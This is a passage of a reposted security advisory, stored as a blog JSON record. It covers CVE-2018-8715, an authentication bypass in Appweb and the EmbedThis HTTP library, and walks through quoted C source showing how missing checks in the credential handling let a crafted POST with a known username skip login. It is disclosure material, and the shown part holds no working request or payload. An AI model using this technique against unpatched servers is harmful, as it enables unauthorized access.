{"id":11742,"date":"2018-03-14T14:20:51","date_gmt":"2018-03-14T22:20:51","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/03\/14\/news-5512\/"},"modified":"2018-03-14T14:20:51","modified_gmt":"2018-03-14T22:20:51","slug":"news-5512","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/03\/14\/news-5512\/","title":{"rendered":"SSD Advisory &#8211; AppWeb Authentication Bypass (Digest, Basic and Forms)"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Wed, 14 Mar 2018 19:01:53 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3676\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3676');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> A critical vulnerability in the EmbedThis HTTP library, and Appweb versions 5.5.x, 6.x, and 7.x including the latest version present in the git repository.<\/p>\n<p>In detail, due to a logic flaw, with a forged HTTP request it is possible to bypass the authentication for form and digest login types.<\/p>\n<p><strong>Confirmed Vulnerable<\/strong><br \/> Appweb version 7.0.2 and prior<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Davide Quarta (@_ocean) and Truel IT, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> Vendor response was exceptionally quick, within 2 days from reporting the vulnerability to them they had a patch available and new version Appweb version 7.0.3 and information available to the public: https:\/\/github.com\/embedthis\/appweb\/issues\/610<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-8715<br \/> <span id=\"more-3676\"><\/span><br \/> <strong>Vulnerability Details<\/strong><br \/> Due to a logical flaw in the authentication procedure, knowing the target username, it is possible to completely bypass authentication of both form and digest type authentications, by means of a crafted HTTP POST request.<\/p>\n<p><em>File http\/httpLib.c \u2013 function authCondition()<\/em><br \/> This function is responsible for calling the two functions that are responsible of authentication: getCredentials, and httpLogin. Notice the lack of checks around httpGetCredentials, it will be useful later.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5aa9a042c3978832337550\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 14559 static int authCondition(HttpConn *conn, HttpRoute *route, HttpRouteOp *op)  14560 {  14561 HttpAuth *auth;  14562 cchar *username, *password;  14563  14564 assert(conn);  14565 assert(route);  14566  14567 auth = route-&gt;auth;  14568 if (!auth || !auth-&gt;type) {  14569 \/* Authentication not required *\/  14570 return HTTP_ROUTE_OK;  14571 }  14572 if (!httpIsAuthenticated(conn)) {  14573 httpGetCredentials(conn, &amp;username, &amp;password);  14574 if (!httpLogin(conn, username, password)) {  14575 if (!conn-&gt;tx-&gt;finalized) {  14576 if (auth &amp;&amp; auth-&gt;type) {  14577 (auth-&gt;type-&gt;askLogin)(conn);  14578 } else {  14579 httpError(conn, HTTP_CODE_UNAUTHORIZED, &#8220;Access Denied, login required&#8221;);  14580 }  14581 \/* Request has been denied and a response generated. So OK to accept this route. *\/  14582 }  14583 return HTTP_ROUTE_OK;  14584 }  14585 }  14586 if (!httpCanUser(conn, NULL)) {  14587 httpTrace(conn, &#8220;auth.check&#8221;, &#8220;error&#8221;, &#8220;msg:&#8217;Access denied, user is not authorized for access'&#8221;);  14588 if (!conn-&gt;tx-&gt;finalized) {  14589 httpError(conn, HTTP_CODE_FORBIDDEN, &#8220;Access denied. User is not authorized for access.&#8221;);  14590 \/* Request has been denied and a response generated. So OK to accept this route. *\/  14591 }  14592 }  14593 \/* OK to accept route. This does not mean the request was authenticated &#8211; an error may have been already generated *\/  14594 return HTTP_ROUTE_OK;  14595 }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0041 seconds] -->  <\/p>\n<p><em>File http\/httpLib.c \u2013 function httpGetCredentials()<\/em><br \/> This function receives two pointers to char arrays that will contain the username and password parsed from the request. Since there are no checks in authCondition, it doesn\u2019t matter if the \u201cparseAuth\u201d function fail, this means we can insert in the WWW-Authenticate header or in the post data for authentication any field we want:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5aa9a042c3981930855479\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 1640 \/*  1641 Get the username and password credentials. If using an in-protocol auth scheme like basic|digest, the  1642 rx-&gt;authDetails will contain the credentials and the parseAuth callback will be invoked to parse.  1643 Otherwise, it is expected that &#8220;username&#8221; and &#8220;password&#8221; fields are present in the request parameters.  1644  1645 This is called by authCondition which thereafter calls httpLogin  1646 *\/  1647 PUBLIC bool httpGetCredentials(HttpConn *conn, cchar **username, cchar **password)  1648 {  1649 HttpAuth *auth;  1650  1651 assert(username);  1652 assert(password);  1653 *username = *password = NULL;  1654  1655 auth = conn-&gt;rx-&gt;route-&gt;auth;  1656 if (!auth || !auth-&gt;type) {  1657 return 0;  1658 }  1659 if (auth-&gt;type) {  1660 if (conn-&gt;authType &amp;&amp; !smatch(conn-&gt;authType, auth-&gt;type-&gt;name)) {  1661 if (!(smatch(auth-&gt;type-&gt;name, &#8220;form&#8221;) &amp;&amp; conn-&gt;rx-&gt;flags &amp; HTTP_POST)) {  1662 \/* If a posted form authentication, ignore any basic|digest details in request *\/  1663 return 0;  1664 }  1665 }  1666 if (auth-&gt;type-&gt;parseAuth &amp;&amp; (auth-&gt;type-&gt;parseAuth)(conn, username, password) &lt; 0) {  1667 return 0;  1668 }  1669 } else {  1670 *username = httpGetParam(conn, &#8220;username&#8221;, 0);  1671 *password = httpGetParam(conn, &#8220;password&#8221;, 0);  1672 }  1673 return 1;  1674 }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c3981930855479-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c3981930855479-35\">35<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-1\"><span class=\"crayon-cn\">1640<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-2\"><span class=\"crayon-c\">1641 Get the username and password credentials. If using an in-protocol auth scheme like basic|digest, the<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-3\"><span class=\"crayon-c\">1642 rx-&gt;authDetails will contain the credentials and the parseAuth callback will be invoked to parse.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-4\"><span class=\"crayon-c\">1643 Otherwise, it is expected that &#8220;username&#8221; and &#8220;password&#8221; fields are present in the request parameters.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-5\"><span class=\"crayon-c\">1644<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-6\"><span class=\"crayon-c\">1645 This is called by authCondition which thereafter calls httpLogin<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-7\"><span class=\"crayon-c\">1646 *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-8\"><span class=\"crayon-cn\">1647<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">PUBLIC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpGetCredentials<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">HttpConn *<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cchar *<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cchar *<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-9\"><span class=\"crayon-cn\">1648<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-10\"><span class=\"crayon-cn\">1649<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpAuth *<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-11\"><span class=\"crayon-cn\">1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-12\"><span class=\"crayon-cn\">1651<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">assert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-13\"><span class=\"crayon-cn\">1652<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">assert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-14\"><span class=\"crayon-cn\">1653<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-15\"><span class=\"crayon-cn\">1654<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-16\"><span class=\"crayon-cn\">1655<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">route<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-17\"><span class=\"crayon-cn\">1656<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-18\"><span class=\"crayon-cn\">1657<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-19\"><span class=\"crayon-cn\">1658<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-20\"><span class=\"crayon-cn\">1659<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-21\"><span class=\"crayon-cn\">1660<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">authType<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">smatch<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">authType<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-22\"><span class=\"crayon-cn\">1661<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">smatch<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;form&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">rx<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">flags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HTTP_POST<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-23\"><span class=\"crayon-cn\">1662<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* If a posted form authentication, ignore any basic|digest details in request *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-24\"><span class=\"crayon-cn\">1663<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-25\"><span class=\"crayon-cn\">1664<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-26\"><span class=\"crayon-cn\">1665<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-27\"><span class=\"crayon-cn\">1666<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">parseAuth<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">parseAuth<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-28\"><span class=\"crayon-cn\">1667<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-29\"><span class=\"crayon-cn\">1668<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-30\"><span class=\"crayon-cn\">1669<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-31\"><span class=\"crayon-cn\">1670<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpGetParam<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;username&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-32\"><span class=\"crayon-cn\">1671<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpGetParam<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;password&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-33\"><span class=\"crayon-cn\">1672<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3981930855479-34\"><span class=\"crayon-cn\">1673<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3981930855479-35\"><span class=\"crayon-cn\">1674<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0037 seconds] -->  <\/p>\n<p><em>File http\/httpLib.c \u2013 function httpLogin()<\/em><br \/> This function will check for the username to be not null, when there is already a session associated, the password pointer can instead be null.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5aa9a042c3985105449381\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain 